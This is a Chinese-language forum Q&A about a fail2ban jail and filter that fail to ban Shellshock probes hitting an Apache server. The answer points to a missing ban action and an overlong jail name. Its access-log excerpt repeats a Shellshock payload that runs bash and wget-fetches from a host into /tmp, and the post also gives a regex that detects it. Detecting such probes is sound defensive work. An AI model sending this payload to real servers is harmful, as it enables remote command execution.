我已经在 Ubuntu 14.04 的库存安装上安装了 Apache 网络服务器,并且我正在尝试使用 fail2ban 来阻止检查漏洞的请求。
我已输入以下内容/etc/fail2ban/jail.local
:
[apache-vulnerability-scan]
enabled = true
port = http,https
filter = apache-vulnerability-scan
logpath = /var/log/apache*/*access.log
maxretry = 1
该规则的定义如下/etc/fail2ban/filter.d/apache-vulnerability-scan.conf
:
[Definition]
failregex = ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
ignoreregex =
对于那些可能不熟悉 Ubuntu 的 fail2ban 默认规则的人来说,一些主要规则如下所示:
ignoreip = 127.0.0.1/8
bantime = 600
findtime = 600
maxretry = 3
backend = auto
usedns = warn
protocol = tcp
chain = INPUT
maxretry
但是,尽管设置为 ,我仍然可以发出请求而 fail2ban 不会禁止我的 IP 1
。
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:43 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
过滤器的状态似乎正常:
# fail2ban-client status apache-vulnerability-scan
Status for the jail: apache-vulnerability-scan
|- filter
| |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache
2/access.log
| |- Currently failed: 0
| `- Total failed: 0
`- action
|- Currently banned: 0
| `- IP list:
`- Total banned: 0
规则本身似乎就是这样的:
Running tests
=============
Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
Use log file : /var/log/apache2/access.log
Results
=======
Failregex: 10 total
|- #) [# of hits] regular expression
| 1) [10] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
| 10.0.2.2 Sat Nov 21 00:11:40 2015
| 10.0.2.2 Sat Nov 21 00:11:40 2015
| 10.0.2.2 Sat Nov 21 00:11:40 2015
| 10.0.2.2 Sat Nov 21 00:11:41 2015
| 10.0.2.2 Sat Nov 21 00:11:41 2015
| 10.0.2.2 Sat Nov 21 00:11:41 2015
| 10.0.2.2 Sat Nov 21 00:11:41 2015
| 10.0.2.2 Sat Nov 21 00:11:42 2015
| 10.0.2.2 Sat Nov 21 00:11:42 2015
| 10.0.2.2 Sat Nov 21 00:11:43 2015
`-
Ignoreregex: 0 total
Date template hits:
|- [# of hits] date format
| [13] Day/MONTH/Year:Hour:Minute:Second
| [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
| [0] WEEKDAY MONTH Day Hour:Minute:Second Year
| [0] WEEKDAY MONTH Day Hour:Minute:Second
| [0] MONTH Day Hour:Minute:Second
| [0] Year/Month/Day Hour:Minute:Second
| [0] Day/Month/Year Hour:Minute:Second
| [0] Day/Month/Year2 Hour:Minute:Second
| [0] Month/Day/Year:Hour:Minute:Second
| [0] Year-Month-Day Hour:Minute:Second[,subsecond]
| [0] Year-Month-Day Hour:Minute:Second
| [0] Year.Month.Day Hour:Minute:Second
| [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
| [0] Day-Month-Year Hour:Minute:Second
| [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
| [0] TAI64N
| [0] Epoch
| [0] ISO 8601
| [0] Hour:Minute:Second
| [0] <Month/Day/Year@Hour:Minute:Second>
| [0] YearMonthDay Hour:Minute:Second
| [0] Month-Day-Year Hour:Minute:Second
`-
Lines: 13 lines, 0 ignored, 12 matched, 1 missed
|- Missed line(s):
| 10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
`-
为什么 fail2ban 规则没有生效?我做错了什么?
答案1
您缺少action
所用规则的,这意味着 fail2ban 不知道在规则匹配时该做什么。您可以为每个 jail 全局或本地配置此规则。操作规则定义在/etc/fail2ban/action.d/
例如,对于全局禁令,您可以在中添加以下内容jail.local
:
banaction = iptables-multiport
请检查jail.conf
文件的“操作”区域以获取更多详细信息。
您还需要缩短监狱名称,apache-vulnerability-scan
因为 iptables 链名称有长度限制。